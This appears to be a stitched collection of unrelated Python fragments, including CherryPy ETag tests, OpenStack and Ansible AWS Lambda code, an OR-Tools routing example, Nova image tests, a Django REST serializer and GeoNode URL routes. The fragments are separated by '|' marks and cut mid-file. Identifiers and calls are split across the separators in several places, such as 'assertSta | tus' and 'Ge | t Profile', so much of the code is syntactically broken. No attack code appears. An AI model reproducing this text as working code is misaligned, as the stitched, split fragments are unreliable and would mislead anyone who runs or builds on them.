self.gui.main_window.history_list.setColumnWidth(4, 140)
self.gui.main_window.history_list.setColumnWidth(5, 120)
self.gui.main_window.is_edit = False
def settings_widget(self, window):
return EnterButton(_('Settings'), self.settings_dialog)
def settings_dialog(self):
d = QDialog()
layout = QGridLayout(d)
layout.addWidget(Q |
import cherrypy
from cherrypy.test import helper
class ETagTest(helper.CPWebCase):
def setup_server():
class Root:
def resource(self):
return "Oh wah ta goo Siam."
resource.exposed = True
def fail(self, code):
code = int(code)
if 300 <= code <= 399:
raise cherrypy.HTTPRedirect([], code)
else:
raise cherrypy.HTTPError(code)
fail.exposed = True
def unicoded(self):
return u'I am a \u1ee4nicode string.'
unicoded.exposed = True
unicoded._cp_config = {'tools.encode.on': True}
conf = {'/': {'tools.etags.on': True,
'tools.etags.autotags': True,
}}
cherrypy.tree.mount(Root(), config=conf)
setup_server = staticmethod(setup_server)
def test_etags(self):
self.getPage("/resource")
self.assertStatus('200 OK')
self.assertHeader('Content-Type', 'text/html;charset=utf-8')
self.assertBody('Oh wah ta goo Siam.')
etag = self.assertHeader('ETag')
# Test If-Match (both valid and invalid)
self.getPage("/resource", headers=[('If-Match', etag)])
self.assertStatus("200 OK")
self.getPage("/resource", headers=[('If-Match', "*")])
self.assertStatus("200 OK")
self.getPage("/resource", headers=[('If-Match', "*")], method="POST")
self.assertStatus("200 OK")
self.getPage("/resource", headers=[('If-Match', "a bogus tag")])
self.assertStatus("412 Precondition Failed")
# Test If-None-Match (both valid and invalid)
self.getPage("/resource", headers=[('If-None-Match', etag)])
self.assertStatus(304)
self.getPage("/resource", method='POST', headers=[('If-None-Match', etag)])
self.assertStatus("412 Precondition Failed")
self.getPage("/resource", headers=[('If-None-Match', "*")])
self.assertStatus(304)
self.getPage("/resource", headers=[('If-None-Match', "a bogus tag")])
self.assertStatus("200 OK")
def test_errors(self):
self.getPage("/resource")
self.assertStatus(200)
etag = self.assertHeader('ETag')
# Test raising errors in page handler
self.getPage("/fail/412", headers=[('If-Match', etag)])
self.assertStatus(412)
self.getPage("/fail/304", headers=[('If-Match', etag)])
self.assertSta | tus(304)
self.getPage("/fail/412", headers=[('If-None-Match', "*")])
self.assertStatus(412)
self.getPage("/fail/304", headers=[('If-None-Match', "*")])
self.assertStatus(304)
def test_unicode_body(self):
self.getPage("/unicoded")
self.assertStatus(200)
etag1 = self.assertHeader('ETag')
self.getPage("/unicoded", headers=[('If-Match', etag1)])
self.assertStatus(200)
sel | f.assertHeader('ETag', etag1)
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from examples.connect import FLAVOR_NAME
from examples.connect import IMAGE_NAME
from examples.connect import NETWORK_NAME
from examples.connect import SERVER_NAME
"""
Managing profiles in the Cluster service.
For a full guide see
https://developer.openstack.org/sdks/python/openstacksdk/users/guides/cluster.html
"""
def list_profiles(conn):
print("List Profiles:")
for profile in conn.cluster.profiles():
print(profile.to_dict())
for profile in conn.cluster.profiles(sort='name:asc'):
print(profile.to_dict())
def create_profile(conn):
print("Create Profile:")
spec = {
'profile': 'os.nova.server',
'version': 1.0,
'properties': {
'name': SERVER_NAME,
'flavor': FLAVOR_NAME,
'image': IMAGE_NAME,
'networks': {
'network': NETWORK_NAME
}
}
}
profile = conn.cluster.create_profile('os_server', spec)
print(profile.to_dict())
def get_profile(conn):
print("Ge | t Profile:")
profile = conn.cluster.get_profile('os_server')
print(profile.to_dict())
def find_profile(conn):
print("Find Profile:")
profile = conn.cluster.find_profile('os_server')
print(profile.to_dict())
def update_profile(conn):
print("Update Profile:")
profile = conn.cluster.update_profile('os_server', name='ol | d_server')
print(profile.to_dict())
def delete_profile(conn):
print("Delete Profile:")
conn.cluster.delete_profile('os_server')
print("Profile deleted.")
|
# coding: utf | -8
from django.db import models
class Band(models.Model):
name = models.CharField(max_length=100)
bio = models.TextField()
rank = models.IntegerField()
class Meta:
ordering = ('name',) | |
#!/usr/bin/env python3
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '..'))
from SetupTools.SetupConfig import SetupConfig
from Interface.Interface import Interface
import importlib
import logging
class Previewer:
def __init__(self):
logging.basicConfig(filename='ArchSetup.preview.log', level=logging.DEBUG, format='%(asctime)s - [%(relativeCreated)6d] - %(name)s - %(levelname)s - %(message)s')
self.setupconfig = SetupConfig()
self.interface = Interface(self.callback)
self.interface.loop()
def callback(self, event):
if event == 'init':
self.windows = []
self.window_index = 0
for x in sys.argv[1:]:
i = importlib.import_module("Interface.Windows."+x)
cl = ge | tattr(i, x)
self.windows.append(cl(self.callback, self.setupconfig))
self.interface.addwin(self.win | dows[self.window_index])
elif event == 'prev':
self.window_index -= 1
self.interface.addwin(self.windows[self.window_index])
elif event == 'next':
self.window_index += 1
if self.window_index == len(self.windows):
self.interface.exit()
return
self.interface.addwin(self.windows[self.window_index])
if __name__ == "__main__":
Previewer()
|
#!/usr/bin/env python3
# Copyright 2010-2021 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simple VRP with special locations which need to be visited at end of the route."""
# [START import]
from ortools.constraint_solver import routing_enums_pb2
from ortools.constraint_solver import pywrapcp
# [END import]
def create_data_model():
"""Stores the data for the problem."""
data = {}
# Special location don't consume token, while regular one consume one
data['tokens'] = [
0, # 0 depot
0, # 1 special node
0, # 2 special node
0, # 3 special node
0, # 4 special node
0, # 5 special node
-1, # 6
-1, # 7
-1, # 8
-1, # 9
-1, # 10
-1, # 11
-1, # 12
-1, # 13
-1, # 14
-1, # 15
-1, # 16
-1, # 17
-1, # 18
]
# just need to be big enough, not a limiting factor
data['vehicle_tokens'] = [20, 20, 20, 20]
data['num_vehicles'] = 4
data['depot'] = 0
return data
def print_solution(manager, routing, solution):
"""Prints solution on console."""
print(f'Objective: {solution.ObjectiveValue()}')
token_dimension = routing.GetDimensionOrDie('Token')
total_distance = 0
total_token = 0
for vehicle_id in range(manager.GetNumberOfVehicles()):
plan_output = f'Route for vehicle {vehicle_id}:\n'
index = routing.Start(vehicle_id)
total_token += solution.Value(token_dimension.CumulVar(index))
route_distance = 0
route_token = 0
while not routing.IsEnd(index):
node_index = manager.IndexToNode(index)
token_var = token_dimension.CumulVar(index)
route_token = solution.Value(token_var)
plan_output += f' {node_index} Token({route_token}) -> '
previous_index = index
index = solution.Value(routing.NextVar(index))
route_distance += routing.GetArcCostForVehicle(
previous_index, index, vehicle_id)
node_index = manager.IndexToNode(index)
token_var = token_dimension.CumulVar(index)
route_token = solution.Value(token_var)
plan_output += f' {node_index} Token({route_token})\n'
plan_output += f'Distance of the route: {route_distance}m\n'
total_distance += route_distance
print(plan_output)
print('Total distance of all routes: {}m'.format(total_distance))
print('Total token of all routes: {}'.format(total_token))
def main():
"""Solve the CVRP problem."""
# Instantiate the data problem.
data = create_data_model()
# Create the routing index manager.
manager = pywrapcp.RoutingIndexManager(len(data['tokens']),
data['num_vehicles'], data['depot'])
# Create Routing Model.
routing = pywrapcp.RoutingModel(manager)
# Create and register a transit callback.
def distance_callback(from_index, to_index):
"""Returns the distance between the two nodes."""
del from_index
del to_index
return 10
transit_callback_index = routing.RegisterTransitCallback(distance_callback)
routing.AddDimension(
transit_callback_index,
0, # null slack
3000, # maximum distance per vehicle
True, # start cumul to zero
'distance')
distance_dimension = routing.GetDimensionOrDie('distance')
distance_dimension.SetGlobalSpanCostCoefficient(100)
# Define cost of each arc.
routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)
# Add Token constraint.
def token_callback(from_index):
"""Returns the number of token consumed by the node."""
# Convert from routing variable Index to tokens NodeIndex.
from_node = manager.IndexToNode(from_index)
return data['tokens'][from_node]
token_callback_index = routing.RegisterUnaryTransitCallback(token_callback)
routing.AddDimensionWithVehicleCapacity(
token_callback_index,
0, # null capacity slack
data['vehicle_tokens'], # vehicle maximum tokens
False, # start cumul to zero
'Token')
# Add constraint: special node can only be visited if token remaining is zero
token_dimension = routing.GetDimensionOrDie('Token')
for node in range(1, 6):
index = manager.NodeToIndex(node)
routing.solver().Add(token_dimension.CumulVar(index) == 0)
# Instantiate route start and end times to produce feasible times.
# [START depot_start_end_times]
| for i in range(manager.GetNumberOfVehicles()):
routing.AddVariableMinimizedByFinalizer(
token_dimension.CumulVar(routing.Start(i)))
| routing.AddVariableMinimizedByFinalizer(
token_dimension.CumulVar(routing.End(i)))
# [END depot_start_end_times]
# Setting first solution heuristic.
search_parameters = pywrapcp.DefaultRoutingSearchParameters()
search_parameters.first_solution_strategy = (
routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)
search_parameters.local_search_metaheuristic = (
routing_enums_pb2.LocalSearchMetaheuristic.GUIDED_LOCAL_SEARCH)
search_parameters.time_limit.FromSeconds(1)
# Solve the problem.
solution = routing.SolveWithParameters(search_parameters)
# Print solution on console.
# [START print_solution]
if solution:
print_solution(manager, routing, solution)
else:
print('No solution found !')
# [END print_solution]
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
# This file is part of Viper - https://github.com/vip | er-framework/viper
# See the file 'LICENSE' for copying permission.
from viper.common.out import print_info
from viper.common.out import print_error
from viper.common.out import print_output
from viper.core.plugins import __modules__
from viper.core.session impo | rt __sessions__
from viper.core.database import Database
from viper.core.config import __config__
from viper.core.storage import get_sample_path
cfg = __config__
def parse_commands(data):
root = ''
args = []
words = data.split()
root = words[0]
if len(words) > 1:
args = words[1:]
return root, args
def autorun_module(file_hash):
if not file_hash:
return
if not __sessions__.is_set():
__sessions__.new(get_sample_path(file_hash))
for cmd_line in cfg.autorun.commands.split(','):
split_commands = cmd_line.split(';')
for split_command in split_commands:
split_command = split_command.strip()
if not split_command:
continue
root, args = parse_commands(split_command)
try:
if root in __modules__:
print_info("Running command \"{0}\"".format(split_command))
module = __modules__[root]['obj']()
module.set_commandline(args)
module.run()
if cfg.modules.store_output and __sessions__.is_set():
Database().add_analysis(file_hash, split_command, module.output)
if cfg.autorun.verbose:
print_output(module.output)
del(module.output[:])
else:
print_error("\"{0}\" is not a valid command. Please check your viper.conf file.".format(cmd_line))
except:
print_error("Viper was unable to complete the command {0}".format(cmd_line))
|
mbda_facts:
query: all
function_name: myFunction
register: my_function_details
# List all versions of a function
- name: List function versions
lambda_facts:
query: versions
function_name: myFunction
register: my_function_versions
# List all lambda function versions
- name: List all function
lambda_facts:
query: all
max_items: 20
- name: show Lambda facts
debug:
var: lambda_facts
'''
RETURN = '''
---
lambda_facts:
description: lambda facts
returned: success
type: dict
lambda_facts.function:
description: lambda function list
returned: success
type: dict
lambda_facts.function.TheName:
description: lambda function information, including event, mapping, and version information
returned: success
type: dict
'''
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import camel_dict_to_snake_dict, get_aws_connection_info, boto3_conn
import json
import datetime
import sys
import re
try:
from botocore.exceptions import ClientError
except ImportError:
pass # protected by AnsibleAWSModule
def fix_return(node):
"""
fixup returned dictionary
:param node:
:return:
"""
if isinstance(node, datetime.datetime):
node_value = str(node)
elif isinstance(node, list):
node_value = [fix_return(item) for item in node]
elif isinstance(node, dict):
node_value = dict([(item, fix_return(node[item])) for item in node.keys()])
else:
node_value = node
return node_value
def alias_details(client, module):
"""
Returns list of aliases for a specified function.
:param client: AWS API client reference (boto3)
:param module: Ansible module reference
:return dict:
"""
lambda_facts = dict()
function_name = module.params.get('function_name')
if function_name:
params = dict()
if module.params.get('max_items'):
params['MaxItems'] = module.params.get('max_items')
if module.params.get('next_marker'):
params['Marker'] = module.params.get('next_marker')
try:
lambda_facts.update(aliases=client.list_aliases(FunctionName=function_name, **params)['Aliases'])
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
lambda_facts.update(aliases=[])
else:
module.fail_json_aws(e, msg="Trying to get aliases")
else:
module.fail_json(msg='Parameter function_name required for query=aliases.')
return {function_name: camel_dict_to_snake_dict(lambda_facts)}
def all_details(client, module):
"""
Returns all lambda related facts.
:param client: AWS API client reference (boto3)
:param module: Ansible module reference
:return dict:
"""
if module.params.get('max_items') or module.params.get('next_marker'):
module.fail_json(msg='Cannot specify max_i | tems nor next_marker for query=all.')
lambda_facts = dict()
function_name = module.params.get('function_name')
if function_name:
| lambda_facts[function_name] = {}
lambda_facts[function_name].update(config_details(client, module)[function_name])
lambda_facts[function_name].update(alias_details(client, module)[function_name])
lambda_facts[function_name].update(policy_details(client, module)[function_name])
lambda_facts[function_name].update(version_details(client, module)[function_name])
lambda_facts[function_name].update(mapping_details(client, module)[function_name])
else:
lambda_facts.update(config_details(client, module))
return lambda_facts
def config_details(client, module):
"""
Returns configuration details for one or all lambda functions.
:param client: AWS API client reference (boto3)
:param module: Ansible module reference
:return dict:
"""
lambda_facts = dict()
function_name = module.params.get('function_name')
if function_name:
try:
lambda_facts.update(client.get_function_configuration(FunctionName=function_name))
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
lambda_facts.update(function={})
else:
module.fail_json_aws(e, msg="Trying to get {0} configuration".format(function_name))
else:
params = dict()
if module.params.get('max_items'):
params['MaxItems'] = module.params.get('max_items')
if module.params.get('next_marker'):
params['Marker'] = module.params.get('next_marker')
try:
lambda_facts.update(function_list=client.list_functions(**params)['Functions'])
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
lambda_facts.update(function_list=[])
else:
module.fail_json_aws(e, msg="Trying to get function list")
functions = dict()
for func in lambda_facts.pop('function_list', []):
functions[func['FunctionName']] = camel_dict_to_snake_dict(func)
return functions
return {function_name: camel_dict_to_snake_dict(lambda_facts)}
def mapping_details(client, module):
"""
Returns all lambda event source mappings.
:param client: AWS API client reference (boto3)
:param module: Ansible module reference
:return dict:
"""
lambda_facts = dict()
params = dict()
function_name = module.params.get('function_name')
if function_name:
params['FunctionName'] = module.params.get('function_name')
if module.params.get('event_source_arn'):
params['EventSourceArn'] = module.params.get('event_source_arn')
if module.params.get('max_items'):
params['MaxItems'] = module.params.get('max_items')
if module.params.get('next_marker'):
params['Marker'] = module.params.get('next_marker')
try:
lambda_facts.update(mappings=client.list_event_source_mappings(**params)['EventSourceMappings'])
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
lambda_facts.update(mappings=[])
else:
module.fail_json_aws(e, msg="Trying to get source event mappings")
if function_name:
return {function_name: camel_dict_to_snake_dict(lambda_facts)}
return camel_dict_to_snake_dict(lambda_facts)
def policy_details(client, module):
"""
Returns policy attached to a lambda function.
:param client: AWS API client reference (boto3)
:param module: Ansible module reference
:return dict:
"""
if module.params.get('max_items') or module.params.get('next_marker'):
module.fail_json(msg='Cannot specify max_items nor next_marker for query=policy.')
lambda_facts = dict()
function_name = module.params.get('function_name')
if function_name:
try:
# get_policy returns a JSON string so must convert to dict before reassigning to its key
lambda_facts.update(policy=json.loads(client.get_policy(FunctionName=function_name)['Policy']))
except ClientError as e:
if e.response['Error']['Code'] == 'ResourceNotFoundException':
lambda_facts.update(policy={})
else:
module.fail_json_aws(e, msg="Trying to get {0} policy".format(function_name))
else:
module.fail_json(msg='Parameter function_name required for query=policy.')
return {function_name: camel_dict_to_snake_dict(lambda_facts)}
def version_details(client, module):
"""
Returns all lambda function versions.
:param client: AWS API client reference (boto3)
:param module: Ansible module reference
:return dict:
"""
lambda_facts = dict()
function_name = module.params.get('function_name')
if function_name:
params = dict()
if module.params.get('max_items'):
params['MaxItems'] = module.params.get('max_items')
if module.params.get('next_marker'):
|
from circularbuffer import CircularBuffer
from pytest import raises
def test_index():
buf = Circul | arBuffer(32)
buf.write(b'asdf\r\njkl;\r\n1234\r\n')
assert buf.index(b'\r\n') == 4
assert buf.index(b'\r\n', 5) == 10
wi | th raises(ValueError):
buf.index(b'x')
buf.clear()
buf.write(b'asdf\r\njkl;\r\n1234\r\na')
assert buf.index(b'\r\n') == 4
assert buf.index(b'\r\n', 5) == 10
with raises(ValueError):
buf.index(b'x')
with raises(ValueError):
buf.index(b'')
|
import rpw
from pyrevit.sc | ript import get_logger
logger = get_logger()
selection = rpw.ui.Selection()
# TODO check in only one loop
number_of_unused_connectors = sum([element.ConnectorManager.UnusedConnectors.Size for element in selection])
logger.debug(number_of_unused_connectors)
if number_of_unused_connectors > 2:
rpw.ui.forms.Alert('Please select only one loop')
for element in selection:
| element.ConnectorManager.UnusedConnectors
|
from elan import *
#Set System description
#Finished
Viewer.Start()
Viewer.CloseAndClean()
Configurator.Start()
Configurator.basicinformation.Click()
Configurator.systemname.Wait()
sleep(1)
Configurator.Edit.SetText(2,"Changed")
Configurator.apply.Wait()
Configurator.apply.Click()
Configurator.RestartHard()
Configurator.WaitForControllerToC | omeBackOnline()
Configurator.S | tart()
Configurator.basicinformation.Click()
Configurator.systemdescriptionchangedset.Wait()
Configurator.Edit.SetText(2," ")
Configurator.apply.Wait()
Configurator.apply.Click()
Configurator.CloseAndClean()
print(' Finished') |
#!/usr/bin/env python3
import inspect
from classes.rgams_SRS import rgams_SRS
from classes.selectorvalve_VICI import selectorvalve_VICI
from classes.selectorvalve_compositeVICI import selectorvalve_compositeVICI
from classes.pressuresensor_WIKA import pressuresensor_WIKA
from classes.pressuresensor_OMEGA import pressuresensor_OMEGA
from classes.temperaturesensor_MAXIM import temperaturesensor_MAXIM
from classes.datafile import datafile
from classes.misc import misc
CLASSES = [ rgams_SRS , selectorvalve_VICI , selectorvalve_compositeVICI , pressuresensor_WIKA , pressuresensor_OMEGA , temperaturesensor_MAXIM , datafile , misc ]
outfile = open('python_API.tex', 'w')
outfile.write( '%% T | HIS NEEDS THE underscore PACKAGE: \\usepackage[strings]{underscore}\n\n' )
for X in CLASSES:
outfile.write ( '\subsubsection{Class \\texttt{' + X.__name__ + '}}\n' )
P = inspect.getsourcefile(X)
outfile.write ( '\path{' + P[P.find('python'):len(P)] + '}\par\n' )
doc = inspect.getdoc(X)
if doc is None:
outfile.write ( 'No class description available.\par' )
else:
# outfile.write ( '\\texttt{' + inspect.getdoc(X) + '+\n' )
outfile.write ( inspect.getdoc( | X) + '\par' )
outfile.write ( '\n\n' )
for name, data in inspect.getmembers(X):
if name[0:2] == '__' :
continue
if name == '__doc__':
continue
if name == '__init__':
continue
if name == '__module__':
continue
outfile.write ( '\paragraph{Method \\texttt{' + name + '}}\n\\vspace{1ex}\n' )
exec ( 'doc = ' + X.__name__ + '.' + name + '.__doc__' )
if doc is None:
outfile.write ( 'No method description available.\par' )
else:
u = ''
for line in doc.splitlines():
u = u + line.lstrip() + '\\newline\n'
outfile.write ( '\\texttt{' + u + '}' )
outfile.write ( '\n\n' )
outfile.close()
|
import scipy.cluster.hierarchy as hcl
from scipy.spatial.distance import squareform
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
from scipy.cluster.hierarchy import dendrogram
import scipy
import json
#data = pd | .read_json(path_ | or_buf= 'C:\Users\davtalab\Desktop\outJSON.json')
parsed_json = json.loads(open('C:\Users\davtalab\Desktop\data.json').read())
print parsed_json[1]['id']
|
': {
'name': long_name,
},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller._action_create_image, req,
FAKE_UUID, body)
def _do_test_create_volume_backed_image(self, extra_properties):
def _fake_id(x):
return '%s-%s-%s-%s' % (x * 8, x * 4, x * 4, x * 12)
body = dict(createImage=dict(name='snapshot_of_volume_backed'))
if extra_properties:
body['createImage']['metadata'] = extra_properties
image_service = glance.get_default_image_service()
bdm = [dict(volume_id=_fake_id('a'),
volume_size=1,
device_name='vda',
delete_on_termination=False)]
props = dict(kernel_id=_fake_id('b'),
ramdisk_id=_fake_id('c'),
root_device_name='/dev/vda',
block_device_mapping=bdm)
original_image = dict(properties=props,
container_format='ami',
status='active',
is_public=True)
image_service.create(None, original_image)
def fake_block_device_mapping_get_all_by_instance(context, inst_id,
use_slave=False):
return [fake_block_device.FakeDbBlockDeviceDict(
{'volume_id': _fake_id('a'),
'source_type': 'snapshot',
'destination_type': 'volume',
'volume_size': 1,
'device_name': 'vda',
'snapshot_id': 1,
'boot_index': 0,
'delete_on_termination': False,
'no_device': None})]
self.stubs.Set(db, 'block_device_mapping_get_all_by_instance',
fake_block_device_mapping_get_all_by_instance)
instance = fakes.fake_instance_get(image_ref=original_image['id'],
vm_state=vm_states.ACTIVE,
root_device_name='/dev/vda')
self.stubs.Set(db, 'instance_get_by_uuid', instance)
volume = dict(id=_fake_id('a'),
size=1,
host='fake',
display_description='fake')
snapshot = dict(id=_fake_id('d'))
self.mox.StubOutWithMock(self.controller.compute_api, 'volume_api')
volume_api = self.controller.compute_api.volume_api
volume_api.get(mox.IgnoreArg(), volume['id']).AndReturn(volume)
volume_api.create_snapshot_force(mox.IgnoreArg(), volume['id'],
mox.IgnoreArg(), mox.IgnoreArg()).AndReturn(snapshot)
self.mox.ReplayAll()
req = fakes.HTTPRequest.blank(self.url)
response = self.controller._action_create_image(req, FAKE_UUID, body)
location = response.headers['Location']
image_id = location.replace('http://localhost/v2/fake/images/', '')
image = image_service.show(None, image_id)
self.assertEqual(image['name'], 'snapshot_of_volume_backed')
properties = image['properties']
self.assertEqual(properties['kernel_id'], _fake_id('b'))
self.assertEqual(properties['ramdisk_id'], _fake_id('c'))
self.assertEqual(properties['root_device_name'], '/dev/vda')
self.assertEqual(properties['bdm_v2'], True)
bdms = properties['block_device_mapping']
self.assertEqual(len(bdms), 1)
self.assertEqual(bdms[0]['boot_index'], 0)
self.assertEqual(bdms[0]['source_type'], 'snapshot')
self.assertEqual(bdms[0]['destination_type'], 'volume')
self.assertEqual(bdms[0]['snapshot_id'], snapshot['id'])
for fld in ('connection_info', 'id',
'instance_uuid', 'device_name'):
self.assertNotIn(fld, bdms[0])
for k in extra_properties.keys():
self.assertEqual(properties[k], extra_properties[k])
def test_create_volume_backed_image_no_metadata(self):
self._do_test_create_volume_backed_image({})
def test_create_volume_backed_image_with_metadata(self):
self._do_test_create_volume_backed_image(dict(ImageType='Gold',
ImageVersion='2.0'))
def _test_create_volume_backed_image_with_metadata_from_volume(
self, extra_metadata=None):
def _fake_id(x):
return '%s-%s-%s-%s' % (x * 8, x * 4, x * 4, x * 12)
body = dict(createImage=dict(name='snapshot_of_volume_backed'))
if extra_metadata:
body['createImage']['metadata'] = extra_metadata
image_service = glance.get_default_image_service()
def fake_block_device_mapping_get_all_by_instance(context, inst_id,
use_slave=False):
return [fake_block_device.FakeDbBlockDeviceDict(
{'volume_id': _fake_id('a'),
'source_type': 'snapshot',
'destination_type': 'volume',
'volume_size': 1,
'device_name': 'vda',
'snapshot_id': 1,
'boot_index': 0,
'delete_on_termination': False,
'no_device': None})]
self.stubs.Set(db, 'block_device_mapping_get_all_by_instance',
fake_block_device_mapping_get_all_by_instance)
instance = fakes.fake_instance_get(image_ref='',
vm_state=vm_states.ACTIVE,
root_device_name='/dev/vda')
self.stubs.Set(db, 'instance_get_by_uuid', instance)
fake_metadata = {'test_key1': 'test_value1',
'test_key2': 'test_value2'}
volume = dict(id=_fake_id('a'),
size=1,
host='fake',
display_description='fake',
volume_image_metadata=fake_metadata)
snapshot = dict(id=_fake_id('d'))
self.mox.StubOutWithMock(self.controller.compute_api, 'volume_api')
volume_api = self.controller.compute_api.volume_api
volume_api.get(mox.IgnoreArg(), volume['id']).AndReturn(volume)
volume_api.get(mox.IgnoreArg(), volume['id']).AndReturn(volume)
volume_api.create_snapshot_force(mox.IgnoreArg(), volume['id'],
mox.IgnoreArg(), mox.IgnoreArg()).AndReturn(snapshot)
req = fakes.HTTPRequest.blank(self.url)
self.mox.ReplayAll()
response = self.controller._action_create_image(req, FAKE_UUID, body)
location = response.headers['Location']
image_id = location.replace('http://localhost/v2/fake/images/', '')
image = image_service.show(None, image_id)
properties = image['properties']
self.assertEqual(properties['test_key1'], 'test_value1')
self.assertEqual(properties['test_key2'], 'test_value2')
if extra_metadata:
for key, val in extra_metadata.items():
self.assertEqual(properties[key], val)
def test_create_vol_backed_img_with | _meta_from_vol_without_extra_meta(self):
self._test_create_volume_backed_image_with_metadata_from_volume()
def test_create_vol_backed_img_with_meta_from_vol_with_extra_meta(self):
self._test_create_volume_backed_image_with_metadata_from_volume(
extra_metadata={'a': 'b'})
|
def test_create_image_snapshots_disabled(self):
"""Don't permit a snapshot if the allow_instance_snapshots flag is
False
"""
self.flags(allow_instance_snapshots=False)
body = {
'createImage': {
'name': 'Snapshot 1',
},
}
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPBadRequest,
self.co |
from rest_framework import serializers
from models import SurveyDraft
from taggit.models import Tag
class WritableJSONField(serializers.Field):
""" Serializer for JSONField -- required to make field writable"""
""" ALSO REQUIRED because the default JSONField serialization includes the
`u` prefix on strings when running Django 1.8, resulting in invalid JSON
"""
def __init__(self, **kwargs):
self.allow_blank= kwargs.pop('allow_blank', False)
super(WritableJSONField, self).__init__(**kwargs)
def to_internal_value(self, data):
if (not data) and (not self.required):
return None
else:
try:
return json.loads(data)
except Exception as e:
raise serializers.ValidationError(
u'Unable to parse JSON: {}'.format(e))
def to_representation(self, value):
return value
class ListSurveyDraftSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = SurveyDraft
fields = ('id', 'name', 'asset_type', 'summary', 'date_modified', 'description')
summary = WritableJSONField(required=False)
class DetailSurveyDraftSerializer(serializers.HyperlinkedModelSerializer):
tags = serializers.SerializerMethodField('get_tag_names')
summary = WritableJSONField(required=False)
class Meta:
model = SurveyDraft
fields = ('id', 'name', 'body', 'summary', 'date_modified', 'description', 'tags')
def get_tag_names(self, obj):
return obj.tags.names()
class TagSerializer(serializers.HyperlinkedM | odelSerializer):
count = serializers.SerializerMethodField()
label = serializers.CharField(source='name')
class Meta:
model = Tag
fields = ('id', 'label', 'count')
def get_count(self, obj):
return SurveyDraft.objects.filter(tags__name__in=[obj.name])\
.filter(user=self.context.get('request', None).user)\
.filter(asset_type='question')\
.count() | |
from .util.deb import deb
from .util.nrange import nrange
from .cell import Cell
#F,e,Cursor
from .grid import spoint
CURSOR_POS=None
def gcp(): #get cursor position
global CURSOR_POS
deb('gcp',CURSOR_POS)
return CURSOR_POS
def scp(x,y):
deb('scp',gcp(),x,y)
cxc=0 #todo, normalize in cursor...
global CURSOR_POS
CURSOR_POS=(x,y)
assert (x,y)==gcp()
#todo cpget and c | pset
cpget=gcp
cpset=scp
def cursor(HG,x,y,f,X,Y):
deb('make an a cursor in the empty space around point in cell x,y',x,y)
#x,y=x-1,y-1
assert len(f)==4
#HG=_clearcursor(HG)
i=x
j=y
scp | (i,j)
cxl=Cell(f[0],0,0)
cyu=Cell(f[1],0,0)
cxr=Cell(f[2],0,0)
cyd=Cell(f[3],0,0,)
HG=spoint(i-1,j,HG,cxl)
HG=spoint(i,j-1,HG,cyu)
HG=spoint(i+1,j,HG,cxr)
HG=spoint(i,j+1,HG,cyd)
return HG
def grid_cursor(HG,x,y,f,X,Y):
return cursor(HG,x,y,f,X,Y)
def _clearcursor(HG):
cp=gcp()
r1=r2=r3=r4=Cell('.',0,0)
deb('clear a cursor in the empty space around point in cell x,y',cp)
if not cp:return HG
i,j=cp
HG=spoint(i-1,j,HG,r1)
HG=spoint(i,j-1,HG,r2)
HG=spoint(i+1,j,HG,r3)
HG=spoint(i,j+1,HG,r4)
return HG
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2012 OpenPlans
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
from django.conf.urls.defaults import patterns, url
js_info_dict = {
'packages': ('geonode.maps',),
}
urlpatterns = patterns('geonode.maps.views',
url(r'^$', 'map_list', name='maps_browse'),
url(r'^tag/(?P<slug>[-\w]+? | )/$', 'maps_tag', name='maps_browse_tag'),
url(r'^new$', 'new_map', name="new_map"),
url(r'^new/data$', 'new_map_json', name='new_map_json'),
url(r'^(?P<mapid>\d+)$', 'map_detail', name='map_detail'),
url(r'^(?P<mapid>\d+)/view$ | ', 'map_view', name='map_view'),
url(r'^(?P<mapid>\d+)/data$', 'map_json', name='map_json'),
url(r'^(?P<mapid>\d+)/download$', 'map_download', name='map_download'),
url(r'^(?P<mapid>\d+)/wmc$', 'map_wmc', name='map_wmc'),
url(r'^(?P<mapid>\d+)/remove$', 'map_remove', name='map_remove'),
url(r'^(?P<mapid>\d+)/metadata$', 'map_metadata', name='map_metadata'),
url(r'^(?P<mapid>\d+)/embed$', 'map_embed', name='map_embed'),
url(r'^(?P<mapid>\d+)/permissions$', 'map_permissions', name='map_permissions'),
url(r'^(?P<mapid>\d+)/thumbnail$', 'map_thumbnail', name='map_thumbnail'),
url(r'^check/$', 'map_download_check', name='map_download_check'),
url(r'^embed/$', 'map_embed', name='map_embed'),
url(r'^(?P<layername>[^/]*)/attributes', 'maplayer_attributes', name='maplayer_attributes'),
